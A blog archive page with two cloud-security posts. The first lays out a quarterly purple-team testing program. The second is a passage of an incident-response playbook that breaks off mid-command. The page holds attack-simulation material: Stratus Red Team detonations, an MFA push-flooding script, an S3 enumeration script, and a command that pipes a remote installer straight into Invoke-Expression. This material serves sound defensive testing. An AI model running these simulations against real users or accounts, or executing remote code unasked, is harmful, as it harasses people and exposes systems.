Purple Team Archives

Continuous Purple Team Testing: Attack Simulations for Your Own Infrastructure

July 10, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

What Is Purple Team? → OWASP Top 10 in the Cloud → Breach Landscape 2020–2025 → Broken Access Control → MFA Fatigue → CI/CD Secrets → SSRF to IMDS → Container Escape → Supply Chain Attacks → Cloud Lateral Movement → Detection Engineering with eBPF → Cloud IR Playbook → Continuous Purple Team Testing

TL;DR

Continuous purple team testing infrastructure is the practice of running structured attack simulations against your own environment on a quarterly cadence — not as an annual audit, but as an operational discipline
Detection time drops exercise-over-exercise when the same technique is simulated repeatedly: the same cross-account AssumeRole technique that took 4 hours to detect in Q4 took 8 minutes by Q2 the following year
The toolchain is open source: Atomic Red Team (ATT&CK-mapped) for host-level techniques, Stratus Red Team for cloud-native attack simulations, and custom scripts for what neither covers
The debrief template — not the tool — is what turns a simulation into a detection improvement; document what fired, what didn’t, and why before closing the exercise
Mean time to detect (MTTD) per technique is the only metric that tells you whether the program is working
Frequency of simulation is the independent variable; better tooling and more headcount are not — how often you practice determines how fast you detect

OWASP Mapping: Cross-cutting — this episode validates defenses against every OWASP Top 10 category covered in this series. EP04 (A01 Broken Access Control), EP05 (A07 Auth Failures), EP06 (A08 Software Integrity), EP07 (A10 SSRF), EP08 (A05 Misconfiguration), EP09 (A06 Vulnerable Components), EP10 (A01 lateral movement), EP11 (A09 Monitoring Failures). Continuous purple team testing is how you verify your fixes for all of them actually hold under simulation.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              QUARTERLY PURPLE TEAM CYCLE                            │
│                                                                     │
│    ┌─────────┐    ┌──────────┐    ┌──────────┐    ┌─────────────┐  │
│    │  PLAN   │───▶│ SIMULATE │───▶│  DETECT  │───▶│   DEBRIEF   │  │
│    │         │    │          │    │  (or miss)│    │             │  │
│    │ • Scope │    │ Red runs │    │           │    │ What fired? │  │
│    │ • Safety│    │ technique│    │ Blue logs │    │ What didn't?│  │
│    │ • Week 1│    │ • Week 2 │    │ results   │    │ • Week 3    │  │
│    └─────────┘    └──────────┘    └──────────┘    └──────┬──────┘  │
│                                                           │         │
│         ┌─────────────────────────────────────────────────┘         │
│         │                                                           │
│         ▼                                                           │
│    ┌─────────┐    ┌──────────┐                                      │
│    │   FIX   │───▶│  REPEAT  │◀──── same technique, updated rules  │
│    │         │    │          │                                      │
│    │ • Rules │    │ Does it  │                                      │
│    │ • Config│    │ catch it │                                      │
│    │ • Week 4│    │ now?     │                                      │
│    └─────────┘    └──────────┘                                      │
│                                                                     │
│    OUTCOME: MTTD drops exercise-over-exercise                       │
│    When MTTD < 10 min: retire technique, rotate in the next one     │
└─────────────────────────────────────────────────────────────────────┘

Continuous purple team testing infrastructure is not a tool you buy or a team you staff. It is a cadence — the same attack path, run repeatedly against your own environment, until detection time drops to a point where the attacker has no useful dwell time.

From EP01 to EP13: The Arc

In EP01, I described a red team engagement where the blue team took 11 days to detect a compromise. The red team used real techniques. The blue team had all the relevant logs. The detection logic just wasn’t tuned to the specific patterns in this specific environment.

That was the same environment, the same attacker playbook, and the same blue team I am about to describe.

Six months later, same scope. Same techniques. The blue team detected in 22 minutes.

Not because they hired anyone new. Not because they switched SIEMs. Not because they bought a new detection product. Because in the intervening six months, they ran four purple team exercises — one per quarter — using the techniques from the first engagement as the test backlog.

Exercise 1: 11 days → 4 hours. Detection rule didn’t exist. Wrote it on the spot during debrief.

Exercise 2: 4 hours → 47 minutes. Rule existed but had a misconfigured threshold that generated false negatives. Fixed during debrief.

Exercise 3: 47 minutes → 38 minutes. Marginal improvement — the technique was becoming well-detected. Rotated in a new technique.

Exercise 4 (new technique): baseline 4+ hours. Same cycle begins.

The number 22 minutes — which is where the original technique sits now — is not a product of better tooling. It is the product of running the simulation four times and fixing the gap found each time.

That is the arc of this series. EP01 defined the practice. EP02 through EP12 gave you the attack backlog. EP13 gives you the program to run them.

Building the Exercise Program

Cadence: The Three Loops

Most organizations treat purple team as an event. An annual penetration test reframed as “collaborative.” One event per year produces one point of data. One point of data is not a trend.

The program that actually moves MTTD operates in three nested loops:

Quarterly exercises — full simulations with red executing and blue observing. Four per year minimum. Each exercise covers one attack path end-to-end, with timestamps, debrief, and detection rule updates. This is the primary loop.

Monthly tabletop drills — no infrastructure required. Two hours. Pull one technique from the backlog, walk through it verbally: “Where would this show up in our logs? What would the CloudTrail event look like? Do we have a rule? What’s the threshold?” No simulation, just shared mental model. Catches drift in detection logic before the quarterly exercise finds it the hard way.

Weekly detection rule reviews — 15-minute async. Run the detection queries that should fire for your most recent exercises. Do they still return results? Rules that worked in October can silently stop working in January when a Terraform apply changes a logging configuration or a GuardDuty region setting drifts. Drift happens without review.

The quarterly exercise is the load-bearing loop. Monthly tabletops and weekly reviews keep it from regressing between exercises.

The Four-Week Exercise Structure

Each quarterly exercise follows the same four-week structure. Deviating from it is how exercises turn into ad hoc sessions with no durable output.

Week 1: Scope Agreement
──────────────────────
□ Which attack path from this series are we testing?
□ Which systems are in scope (account IDs, namespaces, node names)?
□ Circuit breaker: who can call off the exercise and how?
  (One named person. A Slack DM or phone call — not a ticket.)
□ Safety controls: are test accounts isolated from prod data paths?
□ Notification: who needs to know this is happening?
  (Cloud provider account team if large-scale, internal leadership)
□ Pre-exercise baseline: run detection queries now and record results


Week 2: Red Executes, Blue Observes
────────────────────────────────────
□ Red team runs the technique — with the actual tool and actual commands
□ Blue team is watching the SIEM / CloudTrail / Falco / GuardDuty
  in real time during execution
□ Both sides timestamp everything:
  [HH:MM] Technique started
  [HH:MM] First observable artifact (log entry, network event)
  [HH:MM] Alert fired (or: no alert)
  [HH:MM] Blue team acknowledged
□ Do NOT wait until the end to compare notes — call out gaps in real time


Week 3: Debrief and Rule Update
────────────────────────────────
□ Walk through the timeline together — not red presenting to blue
□ For each gap: what data existed? why didn't the rule fire?
  (Data existed + rule wrong: fix the rule)
  (Data existed + rule missing: write the rule)
  (Data didn't exist: fix the logging configuration)
□ Write or update detection rules during the debrief — not as a follow-up ticket
□ Update the runbook: what does the analyst do when this alert fires?
□ Commit all rule changes to version control before the debrief ends


Week 4: Re-Run and Verify
──────────────────────────
□ Red runs the same technique again — no changes to the attack
□ Does the updated detection catch it?
□ Record new MTTD
□ If yes: mark technique as covered, add to retirement queue when MTTD < 10 min
□ If no: iterate — another week of rule work, another re-run
□ Set date and technique for next quarter's exercise

The re-run in Week 4 is not optional. A detection rule written during a debrief and never verified against the actual technique may be logically correct and syntactically wrong, or may fire on a slightly different variant. You don’t know until you run the attack again.

The 10-Attack Rotation from This Series

The techniques in this table are the exercise backlog built across EP04–EP12. Run them in order — or reorder based on your current threat model. The MTTD column is blank until you run the exercise and fill it in.

Quarter	Attack Path	Source Episode	MTTD (Baseline)	MTTD (After Exercise)
Q1 2026	SSRF to EC2 IMDS (IMDSv2 enforcement check)	EP07	—	—
Q2 2026	MFA fatigue simulation against test account	EP05	—	—
Q3 2026	Container escape via `--privileged` pod	EP08	—	—
Q4 2026	Cross-account `sts:AssumeRole` lateral movement	EP10	—	—
Q1 2027	CI/CD secrets exposure via environment variable leak	EP06	—	—
Q2 2027	S3 public access misconfiguration (broken access control)	EP04	—	—
Q3 2027	Supply chain: unsigned artifact injection into pipeline	EP09	—	—
Q4 2027	eBPF-visible process anomaly (persistence via cron)	EP11	—	—
Q1 2028	CloudTrail disable + GuardDuty suppression	EP12	—	—
Q2 2028	Full path: SSRF → IMDS → AssumeRole → S3 exfil	EP07 + EP10	—	—

Fill in the MTTD columns as you run. That table, populated over two years, is your program’s evidence of improvement. It is also what you show an auditor, a CISO, or a board when asked “how do you know your security controls work?”

The Toolchain

Atomic Red Team (ATT&CK-Mapped Host Techniques)

Atomic Red Team is Red Canary’s library of ATT&CK-mapped attack simulations. Each atomic test maps to a specific MITRE technique, lists the required permissions, and runs as a self-contained script. The library covers over 900 techniques across Linux, macOS, and Windows.

pwsh -Command "Install-Module -Name invoke-atomicredteam -Scope CurrentUser -Force"

# Install the Atomics folder (the actual test library)
pwsh -Command "Invoke-Expression (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"

# List all techniques available for Linux
pwsh -Command "Invoke-AtomicTest All -ShowDetailsBrief -OS linux"

# Inspect a specific technique before running (T1078: Valid Accounts)
pwsh -Command "Invoke-AtomicTest T1078 -ShowDetails"

# Run test #1 for T1078 (shows what commands execute — dry run first)
pwsh -Command "Invoke-AtomicTest T1078 -TestNumbers 1 -CheckPrereqs"

# Execute the test
pwsh -Command "Invoke-AtomicTest T1078 -TestNumbers 1"

# Clean up after the test
pwsh -Command "Invoke-AtomicTest T1078 -TestNumbers 1 -Cleanup"

For the exercises in this series, the most relevant atomic techniques are:

MITRE Technique	ID	Covers
Valid Accounts	T1078	EP05 (credential reuse)
Cloud Instance Metadata API	T1552.005	EP07 (IMDS access)
Container Administration Command	T1609	EP08 (exec into container)
Steal Application Access Token	T1528	EP06 (CI/CD token theft)
Account Discovery	T1087.004	EP04, EP10 (IAM enumeration)

Stratus Red Team (Cloud-Native Attack Simulations)

Stratus Red Team is DataDog’s cloud-specific attack simulation framework. Unlike Atomic Red Team (which focuses on host techniques), Stratus covers AWS, GCP, Azure, and Kubernetes attack paths using the actual cloud APIs — the same calls an attacker would make.

# Install (requires Go 1.21+)
go install github.com/DataDog/stratus-red-team/v2/cmd/stratus@latest

# Verify
stratus version

# List all available techniques
stratus list

# List AWS-specific techniques only
stratus list --platform aws

# List Kubernetes techniques
stratus list --platform kubernetes

# Get details on a specific technique before running
stratus show aws.credential-access.ec2-get-user-data

The workflow for each Stratus technique is: warm up (provision prerequisites) → detonate (execute the attack) → cleanup (remove artifacts). Never skip cleanup.

# EP07 exercise: SSRF to IMDS credential access simulation
# Warm up (provisions a test EC2 instance)
stratus warmup aws.credential-access.ec2-get-user-data

# Detonate: simulates accessing EC2 user data to extract credentials
stratus detonate aws.credential-access.ec2-get-user-data

# At this point: check CloudTrail for GetUserData events
# Check GuardDuty for credential access findings
# Record whether your detection fired and when

# Cleanup (terminates the test instance)
stratus cleanup aws.credential-access.ec2-get-user-data

# EP10 exercise: cross-account role assumption
stratus warmup aws.lateral-movement.ec2-instance-connect
stratus detonate aws.lateral-movement.ec2-instance-connect

# Detection check: look for AssumeRole events from unexpected principals
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time $(date -d '1 hour ago' -u +%Y-%m-%dT%H:%M:%SZ) \
  --query 'Events[].{Time:EventTime,User:Username,Source:SourceIPAddress}' \
  --output table

stratus cleanup aws.lateral-movement.ec2-instance-connect

# EP08 exercise: Kubernetes container escape simulation
stratus warmup k8s.privilege-escalation.privileged-pod
stratus detonate k8s.privilege-escalation.privileged-pod

# Detection check: Falco should fire container_escape_detection
# Check kubectl audit logs for privileged pod creation
kubectl get events --field-selector reason=Created -A | grep -i privileged

stratus cleanup k8s.privilege-escalation.privileged-pod

The full Stratus technique list as of this writing covers 50+ AWS techniques and 10+ Kubernetes techniques. Run stratus list after installing to see what’s current — the library is actively maintained and new techniques are added when new attack patterns emerge in the wild.

Building Custom Simulation Scripts

Atomic Red Team and Stratus don’t cover everything. MFA fatigue in particular requires tooling specific to your identity provider. Build simple, focused scripts for the gaps.

#!/bin/bash
# simulate-mfa-fatigue.sh
# Simulates an MFA fatigue attack by triggering repeated push notifications
# to a test account. Run ONLY against a designated test user — never a real
# employee account. The test account should have MFA enabled but no access
# to any production systems.
#
# Usage: ./simulate-mfa-fatigue.sh <test-user-email> <idp-test-api-endpoint>
# Example: ./simulate-mfa-fatigue.sh [email protected] https://idp.internal/test/push

TEST_USER="${1:[email protected]}"
IDP_ENDPOINT="${2:-}"
PUSH_COUNT=10
PUSH_INTERVAL=30  # seconds between pushes

if [ -z "$IDP_ENDPOINT" ]; then
  echo "ERROR: IDP test API endpoint required as second argument"
  exit 1
fi

echo "MFA fatigue simulation"
echo "Target user: $TEST_USER"
echo "Push count: $PUSH_COUNT"
echo "Interval: ${PUSH_INTERVAL}s"
echo ""
echo "Blue team: watch for repeated MFA push events in your IdP logs"
echo "Detection signal: >3 push requests to the same user within 5 minutes"
echo ""

START_TIME=$(date -u +%Y-%m-%dT%H:%M:%SZ)
echo "[$(date -u +%H:%M:%S)] Simulation started — timestamp this for your debrief"

for i in $(seq 1 $PUSH_COUNT); do
  echo "[$(date -u +%H:%M:%S)] Sending push request $i of $PUSH_COUNT..."

  # Trigger push via your IdP's test/simulation API
  # Okta example: POST /api/v1/authn/factors/{factorId}/verify
  # Replace with your IdP's actual test endpoint
  HTTP_STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
    -X POST "$IDP_ENDPOINT" \
    -H "Content-Type: application/json" \
    -d "{\"username\": \"$TEST_USER\", \"factor\": \"push\", \"simulation\": true}")

  echo "    Response: HTTP $HTTP_STATUS"

  if [ "$i" -lt "$PUSH_COUNT" ]; then
    sleep "$PUSH_INTERVAL"
  fi
done

END_TIME=$(date -u +%Y-%m-%dT%H:%M:%SZ)
echo ""
echo "[$(date -u +%H:%M:%S)] Simulation complete"
echo "Start: $START_TIME"
echo "End:   $END_TIME"
echo ""
echo "Blue team: check IdP logs for push events in this window"
echo "Expected detection: alert on >3 MFA pushes to single user in 5 min"

#!/bin/bash
# simulate-s3-enum.sh
# Simulates the access pattern of an attacker enumerating S3 buckets
# after obtaining IAM credentials. Run in a test AWS account only.
# Purpose: verify CloudTrail ListBuckets and GetBucketAcl events fire
# and that your detection rule catches credential-based enumeration.

echo "[$(date -u +%H:%M:%S)] S3 enumeration simulation starting"
echo "Blue team: watch CloudTrail for ListBuckets from unexpected IAM principal"

# Enumerate buckets
echo "[$(date -u +%H:%M:%S)] ListBuckets..."
aws s3api list-buckets --query 'Buckets[].Name' --output text

# Attempt to read bucket ACLs (generates GetBucketAcl events)
echo "[$(date -u +%H:%M:%S)] Checking ACLs..."
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[].Grantee | select(.URI != null) | .URI' | \
      grep -q "AllUsers" && echo "PUBLIC ACL: $bucket"
  done

echo "[$(date -u +%H:%M:%S)] Enumeration complete — check CloudTrail now"

The pattern for custom scripts: timestamp every action, print what the blue team should be watching for, clean up after execution. A simulation script that leaves test resources running is how exercises create incidents instead of preventing them.

Measuring Progress

The metric that matters is MTTD per technique, tracked over time. Everything else — alert count, tool coverage, headcount — is a proxy.

MTTD tracking table: Cross-Account AssumeRole (EP10)
─────────────────────────────────────────────────────
Exercise   Date      Technique              MTTD      Notes
─────────────────────────────────────────────────────
Q4 2025    Oct 12    Cross-acct AssumeRole  4 hours   No detection rule existed
Q1 2026    Jan 18    Cross-acct AssumeRole  45 min    Rule written, threshold wrong
Q2 2026    Apr 5     Cross-acct AssumeRole  8 min     Threshold fixed, alert configured
─────────────────────────────────────────────────────
Status: MTTD < 10 min achieved — technique retired from rotation
Next: Rotate in CI/CD secrets exposure (EP06)

When MTTD falls below 10 minutes for a technique, retire it from the quarterly rotation. Add it to a “verified coverage” list. Run it annually to confirm the detection hasn’t regressed. Rotate a new technique from the backlog into the quarterly slot.

Ten minutes is the threshold because below that, an attacker executing this technique in your environment has less dwell time than it takes them to pivot to the next stage. It’s not a hard security boundary — it is a practical operational signal that the technique is well-detected enough to stop driving your exercise cadence.

Track coverage at the series level:

# Create a coverage tracking file
cat > ~/purple-team-coverage.txt << 'EOF'
Technique                      Episode  Status          MTTD
──────────────────────────────────────────────────────────────
S3 public access (broken ACL)  EP04     Not started     —
MFA fatigue                    EP05     Not started     —
CI/CD secrets (env var leak)   EP06     Not started     —
SSRF to IMDS                   EP07     Not started     —
Container escape (privileged)  EP08     Not started     —
Supply chain (unsigned build)  EP09     Not started     —
Cross-account AssumeRole       EP10     Not started     —
Process anomaly (eBPF-visible) EP11     Not started     —
CloudTrail disable             EP12     Not started     —
Full chain (EP07 + EP10)       EP07+10  Not started     —
EOF

Update the status column after each exercise. “Not started” → “In rotation” → “MTTD: X min” → “Retired (< 10 min)”. That file, kept in version control, is the program’s durable record.

The Debrief Template

The debrief is where the detection improvement happens. Without structure, debriefs turn into post-mortems that produce action items nobody closes. Use this template — fill it out during the debrief, not after.

# Purple Team Exercise Debrief

Exercise:      [name, e.g. "SSRF to IMDS — Q1 2026"]
Date:          [YYYY-MM-DD]
Attack path:   [from which EP, e.g. "EP07: SSRF to Cloud Metadata"]
Participants:  [red team members] / [blue team members]

## Timeline

| Time (UTC) | Event |
|------------|-------|
| HH:MM      | Attack started |
| HH:MM      | First observable artifact (specify: log entry / network event / process spawn) |
| HH:MM      | Alert fired in [tool] — or: no alert |
| HH:MM      | Blue team acknowledged |
| HH:MM      | Exercise concluded |

MTTD this exercise: [X hours / Y minutes / not detected]

## What Fired

- [Tool]: [Alert name / rule name] — fired at [HH:MM], [latency] after attack started
- [Tool]: [Alert name] — fired at [HH:MM]

## What Should Have Fired and Didn't

- [Expected detection] — root cause: [rule missing / rule wrong / data missing / log not ingested]
- [Expected detection] — root cause: [...]

## Root Cause of Gaps

1. [Gap 1]: [Why the detection didn't exist or didn't work — be specific]
2. [Gap 2]: [...]

## Actions

- [ ] Write detection rule for [gap] — owner: [name] — due: [date]
- [ ] Update runbook [X] to include response steps for [alert] — owner: [name]
- [ ] Fix configuration: [Y] — owner: [name] — due: [date]
- [ ] Commit all rule changes to [repo/path] — owner: [name] — due: today

## Re-Run Result (Week 4)

Date:          [YYYY-MM-DD]
MTTD:          [X minutes]
Detection:     [fired / did not fire]
Notes:         [what changed, what's still open]

## Next Exercise

Date:          [target quarter start]
Technique:     [from backlog]
Source:        [EP number]

The most important line in this template is “due: today” for committing rule changes to version control. Detection improvements that live only in the SIEM’s web UI get overwritten by the next infrastructure apply or the next policy sync. They disappear without a trace, and the next exercise finds the same gap again.

Series Closer: What This Series Taught

Looking back across all 13 episodes:

EP01 — Purple team is a practice, not a team. Red executes, blue observes, both debrief together.
EP02 — OWASP Top 10 applies to infrastructure. Every category has a cloud-native equivalent.
EP03 — The 2020–2025 breach landscape is three themes: identity, supply chain, misconfiguration.
EP04 — Broken access control is the most common failure. IAM wildcards and public S3 buckets are the infrastructure form.
EP05 — MFA fatigue exploits push-based MFA UX. The fix is hardware keys — not training.
EP06 — Secrets in CI/CD pipelines are structural, not behavioral. Pre-commit hooks and SAST scanning are the fix.
EP07 — IMDSv1 has no authentication. Any SSRF anywhere is a straight line to IAM credentials.
EP08 — --privileged erases the boundary between container and host. Two commands from compromised pod to root on the node.
EP09 — Supply chain attacks target the trust chain, not the code. XZ Utils was two years of social engineering.
EP10 — Cloud lateral movement is IAM trust misconfiguration, not network pivoting. One overly broad sts:AssumeRole trust policy is enough.
EP11 — eBPF sees what CloudTrail doesn’t — kernel-level process and network events in real time, before the attacker’s process exits.
EP12 — Incident response quality is inversely proportional to how much you practiced it. The organizations that contain in 4 hours practiced containing in 4 hours.
EP13 — Frequency of simulation is the variable that changes detection time.

Every attack in this series exploited something that existed before the attacker arrived. The attacker didn’t create the IAM wildcard, the ungated CI/CD pipeline, the privileged pod, or the IMDSv1 endpoint. They found what was already there.

Purple team is how you find it first.

That’s the entire premise. Thirteen episodes to demonstrate it across ten attack paths. The practice is now yours to run.

What’s Next — Cross-Series

The Purple Team Playbook ends here, but the technical depth that makes it work lives in three other series running in parallel on linuxcent.com:

Kernel-level detection — the eBPF: From Kernel to Cloud series covers everything from kernel hooks and BPF maps to Cilium and runtime security with Tetragon. EP11 in this series referenced eBPF detection; the eBPF series is where the implementation depth lives.

Hardened base images — closing the OS-level attack surface that EP08 and EP09 in this series exploited starts at image build time. The hardened image pipeline gate post covers building signed, minimal base images that eliminate entire attack surface categories before the container ever starts.

The identity layer — every attack in this series ultimately had an IAM component: the overly permissive role, the wildcard policy, the cross-account trust boundary that was too broad. What Is Cloud IAM starts the 12-episode Cloud IAM series that maps the identity architecture underpinning all of it.

These series are designed to be read in parallel — techniques that appear as one-line references in this series get full treatment in the others. The eBPF series covers TC hooks and bpftrace in the depth that EP11 introduced. The IAM series covers sts:AssumeRole trust policies in the depth that EP10 referenced.

Get notified when the next series starts → linuxcent.com/subscribe

⚠ Production Gotchas

Test account isolation is not optional. Every simulation in this series should run in a dedicated AWS account (or GCP project / Azure subscription) with no trust relationships to production accounts. One stratus detonate command that runs in a prod account and modifies IAM trust policies is an incident, not an exercise. The cost of a test account is zero compared to the cost of a real incident.

Stratus leaves state. If you interrupt a stratus detonate run, the warmup infrastructure is still running and costing you money. Always run stratus cleanup even after an interrupted exercise. Add it to a trap in your exercise runbook.

Detection rules written during debriefs may use syntax your SIEM doesn’t support. Rule logic written in a 30-minute debrief window gets reviewed quickly. Run each new rule against 30 days of historical logs before relying on it. A rule that has never matched against known-bad historical data may have a quiet logic error.

Alerting ≠ detection. A rule that fires but routes to a queue no one monitors is not a detection. The debrief template asks “alert fired in [tool]” — confirm the alert also appeared in a queue that an on-call engineer would have seen. Route validation is part of the exercise.

Scope creep kills exercises. The first quarter an exercise runs long, someone proposes “let’s just add two more techniques since we have time.” Don’t. Four well-documented techniques with full debrief and verified re-runs beat ten half-documented techniques with action items that never close. Keep the scope tight. Add techniques by rotating them into the next quarter’s slot.

Quick Reference

Component	What It Is	When to Use
Atomic Red Team	ATT&CK-mapped host technique library	Host-level techniques: process execution, credential access, persistence
Stratus Red Team	Cloud-native attack simulations	AWS/GCP/Azure/K8s API-based attack paths
Custom scripts	Org-specific simulations	MFA fatigue, IdP-specific attacks, internal tool abuse
MTTD	Mean time to detect — measured per technique	Primary metric; track over time per technique
Circuit breaker	Named person who can halt an exercise	Safety control; must be identified in Week 1
Debrief template	Structured post-exercise documentation	Filled during debrief, committed to version control same day
Retirement threshold	MTTD < 10 minutes	When to rotate a technique out of quarterly rotation
Coverage list	Techniques with verified detections	Auditable record of what your program has validated

Key Takeaways

Continuous purple team testing infrastructure means running the same attack paths quarterly — not annually — until MTTD per technique drops below 10 minutes
The four-week exercise structure (scope → simulate → debrief → re-run) is the unit of work; deviating from it is how exercises produce action items instead of detection improvements
Atomic Red Team covers ATT&CK-mapped host techniques; Stratus Red Team covers cloud-native attack simulations; custom scripts cover what neither does
The debrief template — filled in during the session, committed to version control before the session ends — is what separates exercises that improve detection from exercises that produce unread reports
MTTD < 10 minutes for a technique means retire it and rotate in the next one from the backlog this series gave you
The frequency of simulation is the variable that changes detection time. Not the tools. Not the headcount. How often you practice.

Cloud Incident Response Playbook: First 24 Hours After a Breach

July 8, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes container escape → Supply chain attack detection → Cloud lateral movement IAM → Detection engineering with eBPF → Cloud Incident Response Playbook

TL;DR

A cloud incident response playbook is not documentation you write after a breach — it is the executable sequence your team runs in the first 24 hours, rehearsed before the breach happens
The ChangeHealthcare attack (February 2024) disrupted $22 billion in medical claims processing and exposed 190 million Americans’ health data; the initial vector was a single set of stolen credentials and a Citrix portal with no MFA
Hours 0–1: declare the incident immediately, scope the blast radius, and start querying CloudTrail — do not investigate quietly
Hours 1–4: contain by revoking credentials and isolating infrastructure, but preserve evidence before any remediation — forensic snapshots and log exports before terminating anything
Hours 4–12: trace lateral movement via AssumeRole chains, identify persistence mechanisms (new IAM users/roles, Lambda backdoors, modified images), and confirm the full data access scope
Hours 12–24: eradicate from known-good baselines, not by patching compromised instances; recover dev → staging → prod; trigger regulatory notification timers

OWASP Mapping: Cross-cutting — incident response is not mapped to a single OWASP category because a breach can enter through any of them. IR quality is the backstop when prevention fails across A01 (broken access control), A07 (authentication failures), A08 (supply chain), and every other vector. The 24-hour window covered here applies regardless of initial entry point.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│            CLOUD INCIDENT RESPONSE: THE 24-HOUR SEQUENCE                │
│                                                                         │
│  ALERT                                                                  │
│    GuardDuty / Falco / anomaly detection fires                          │
│    ↓                                                                    │
│  TRIAGE  [0–1h]                                                         │
│    Declare incident → scope blast radius → open incident channel        │
│    Is the attacker still active? What data is at risk?                  │
│    ↓                                                                    │
│  CONTAIN  [1–4h]                                                        │
│    Revoke credentials → isolate compute → cordon K8s nodes             │
│    !! Do NOT terminate instances before snapshot !!                     │
│    ↓                                                                    │
│  PRESERVE  [1–4h, parallel with contain]                                │
│    EBS snapshots → CloudTrail log export → VPC Flow export              │
│    Forensic copy before any remediation changes the system state        │
│    ↓                                                                    │
│  INVESTIGATE  [4–12h]                                                   │
│    AssumeRole chain analysis → data access scope → persistence hunt     │
│    eBPF/Falco/Tetragon evidence if available (see EP11)                 │
│    ↓                                                                    │
│  ERADICATE  [12–24h]                                                    │
│    Remove persistence → rotate ALL credentials in blast radius          │
│    Replace compromised instances from known-good hardened AMI           │
│    ↓                                                                    │
│  RECOVER  [12–24h]                                                      │
│    dev → staging → prod sequence. Never prod-first.                     │
│    Verify monitoring before declaring all-clear                         │
│    ↓                                                                    │
│  LEARN                                                                  │
│    Post-incident review → timeline → regulatory notifications           │
│    Update playbook before the next incident                             │
└─────────────────────────────────────────────────────────────────────────┘

A cloud incident response playbook that exists only as a document is not an incident response capability. The sequence above is only useful if your team has rehearsed it — run it as a tabletop, run it in a chaos exercise, run it on a simulated breach in a non-prod account. The first time through this sequence should not be during an actual breach.

The Incident: ChangeHealthcare (February 2024)

On February 21, 2024, ransomware attacked Change Healthcare, a UnitedHealth Group subsidiary that processes roughly 50% of US medical claims. By the time containment completed, the damage was:

$22 billion in medical claims processing disrupted
190 million Americans’ health data potentially exposed
Hospitals unable to process insurance claims for weeks — some faced payroll crises because they couldn’t get reimbursed for care already delivered
A $22 million ransom paid to ALPHV/BlackCat, followed by ALPHV exit-scamming the affiliate (keeping the ransom), followed by RansomHub re-extorting with the same data

The initial vector: a Citrix remote access portal with no MFA enforced. A single set of stolen credentials. That’s it.

What made the outcome as severe as it was: the attackers had nine days of dwell time before the ransomware detonated. Nine days of lateral movement, data staging, and backup discovery before the explosion. The first 24 hours after detection determine whether you contain an intrusion or respond to a full-scale breach. The ChangeHealthcare team was responding to a full-scale breach because the first 24 hours happened nine days before anyone knew there was an incident.

There is an inverse relationship between incident response quality and preparation investment. Teams that contain in four hours practiced containing in four hours. Teams that discover they have no forensic evidence discover that during the investigation, not before it.

Hour 0–1: Detect and Declare

Step 1: Declare — Do Not Investigate Quietly

The instinct when something looks suspicious is to investigate before escalating. That instinct is wrong in cloud incidents. Every minute of quiet investigation is a minute the attacker may be escalating privileges, staging data, or discovering your backups.

Declare the incident immediately. The threshold for declaration is suspicion, not confirmation.

Who to notify in the first 15 minutes:
– CISO (or on-call security lead)
– Legal counsel (regulatory clock starts now; you need legal involved from minute one)
– On-call SRE lead (you will need infrastructure access)
– Communications lead (if external-facing systems are involved)

Operational setup:
1. Create a dedicated incident Slack channel: #incident-YYYY-MM-DD-brief-descriptor
2. Start an incident log — a shared doc, timestamped, with every action taken and by whom. This becomes your evidence log and your regulatory submission document.
3. Assign a scribe. The incident commander should not also be taking notes.

Step 2: Scope the Blast Radius

Before touching anything, answer three questions:

Is the attacker still active? (Is this ongoing or historical?)
What is the potential blast radius? (Which accounts, regions, services, principals are in scope?)
What data is at risk? (PII, credentials, intellectual property, PHI/PII with regulatory implications?)

Step 3: Initial CloudTrail Query

# Run this before touching anything — you want a clean baseline
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=suspected-role \
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].[EventTime,EventName,Resources[0].ResourceName]' \
  --output table

# If you don't know the principal yet — look for unusual API activity
# across all principals in the last hour
aws cloudtrail lookup-events \
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].{Time:EventTime,User:Username,Event:EventName,Source:EventSource}' \
  --output json | \
  jq 'sort_by(.Time) | reverse | .[:50]'
# Look for: CreateUser, AttachRolePolicy, PutRolePolicy, CreateAccessKey,
#           GetSecretValue, ListBuckets, DescribeInstances in rapid succession

# Check GuardDuty for the triggering finding
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty get-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-ids $(aws guardduty list-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-criteria '{
      "Criterion": {
        "updatedAt": {"Gte": '$(date -d '24 hours ago' +%s000)'}
      }
    }' \
    --sort-criteria '{"AttributeName":"updatedAt","OrderBy":"DESC"}' \
    --max-results 10 \
    --query 'FindingIds' --output text) | \
  jq '.Findings[] | {type: .Type, severity: .Severity, time: .UpdatedAt, detail: .Description}'

Hour 1–4: Contain Without Destroying Evidence

The central tension in early containment: you need to stop the bleeding, but you also need the evidence. Terminating a compromised EC2 instance stops the threat on that instance — it also destroys the process table, network connections, in-memory artifacts, and filesystem state that the investigation needs.

The order of operations:
1. Preserve (snapshot, export logs)
2. Contain (revoke credentials, isolate network)
3. Never terminate before step 1

Evidence Preservation (Before Any Containment Action)

# Create EBS snapshots of ALL volumes on compromised instances
# Do this FIRST — before network isolation, before anything
aws ec2 describe-instances \
  --instance-ids i-compromised-instance-id \
  --query 'Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId' \
  --output text | tr '\t' '\n' | \
  while read vol_id; do
    echo "Snapshotting volume: ${vol_id}"
    aws ec2 create-snapshot \
      --volume-id "${vol_id}" \
      --description "IR evidence - $(date --iso-8601) - ${vol_id}" \
